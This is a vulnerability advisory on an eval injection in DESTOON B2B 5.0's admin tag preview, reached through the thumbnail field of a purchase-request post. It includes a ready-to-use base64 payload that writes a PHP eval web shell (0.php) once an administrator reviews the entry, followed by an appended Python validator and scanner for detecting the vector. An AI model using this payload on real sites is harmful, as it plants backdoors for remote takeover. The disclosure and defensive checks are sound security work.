### Brief description:
Tested version
DESTOON B2B Version 5.0 Release 20140625 UTF-8 ZH-CN
### Details:
0. Affected file: admin/tag.inc.php
Line 95, `eval($tag_code);`, applies no security restriction to the user-supplied code in tag_code before executing it.
![0.jpg](https://images.seebug.org/upload/201407/07101233cb524baf7c9d0a2c743654e5e17fa520.jpg)
1. Register a member account on the front end.
2. Go to the member center and post a purchase request ("求购") entry:
Title: arbitrary
Industry category: arbitrary
Product image: using the browser's inspect-element tool, change the value of post[thumb] to ?file=tag&action=preview&tag_code=file_put_contents(base64_decode(MC5waHA),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2FdKTsgPz4))
Submit.
![2.jpg](https://images.seebug.org/upload/201407/07101305b98be2d789ca2fe2c46dbc536c6fdd59.jpg)
3. As soon as an administrator reviews the entry in the admin back end, the following code is executed:
file_put_contents(base64_decode(MC5waHA),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2FdKTsgPz4))
![3.jpg](https://images.seebug.org/upload/201407/07101350c7603b306d3804b1a782e3d2509837c2.jpg)
![4.jpg](https://images.seebug.org/upload/201407/07101406346e0e772944ba8de6c13aeb0c3d0e43.jpg)
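The root cause is that a value meant to be an image path (post[thumb]) is stored unchecked and later reaches the admin tag preview handler, where tag_code is passed straight to eval. The following added example (not part of the advisory or of Destoon) shows two defensive checks a site operator could run: an allow-list validator for thumbnail values, and a scanner that flags stored or logged thumb values carrying a `file=tag&...&tag_code=` query. The sample values are constructed; the tag_code expressions in them are harmless placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample values as they might appear in a stored thumb column or an access log.
# Entries 1 and 2 mirror the vector described above (the tag preview reached via the thumb field).
SAMPLE_THUMBS = [
    "file/upload/201407/abc.jpg",
    "?file=tag&action=preview&tag_code=phpinfo()",
    "%3Ffile%3Dtag%26action%3Dpreview%26tag_code%3Decho(1)",  # URL-encoded variant
    "http://example.invalid/img/logo.png",
]

ALLOWED_EXT = (".jpg", ".jpeg", ".png", ".gif")


def is_tag_preview_injection(value: str) -> bool:
    """True if a 'thumbnail' value is really a request to the admin tag preview handler."""
    decoded = unquote(unquote(value))  # peel up to two layers of URL encoding
    query = urlsplit(decoded).query
    params = {k.lower(): v for k, v in parse_qs(query, keep_blank_values=True).items()}
    return params.get("file", [""])[0].lower() == "tag" and "tag_code" in params


def is_acceptable_thumb(value: str) -> bool:
    """Allow-list check a hardened save path could apply before storing post[thumb]:
    no query string or fragment, and the path must end in an image extension."""
    decoded = unquote(value)
    if "?" in decoded or "#" in decoded:
        return False
    path = urlsplit(decoded).path.lower()
    return path.endswith(ALLOWED_EXT) and not re.search(r"[<>\"'\\]", path)


def scan(values):
    """Return every value that is either a preview injection or fails the allow-list."""
    return [v for v in values if is_tag_preview_injection(v) or not is_acceptable_thumb(v)]


if __name__ == "__main__":
    for hit in scan(SAMPLE_THUMBS):
        print("suspicious thumb value:", hit)
```

The allow-list check is the fix a developer would apply at input time; the scanner is what an operator would run over existing records to find entries that already slipped through.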
### Proof of vulnerability:
![4.jpg](https://images.seebug.org/upload/201407/07101406346e0e772944ba8de6c13aeb0c3d0e43.jpg)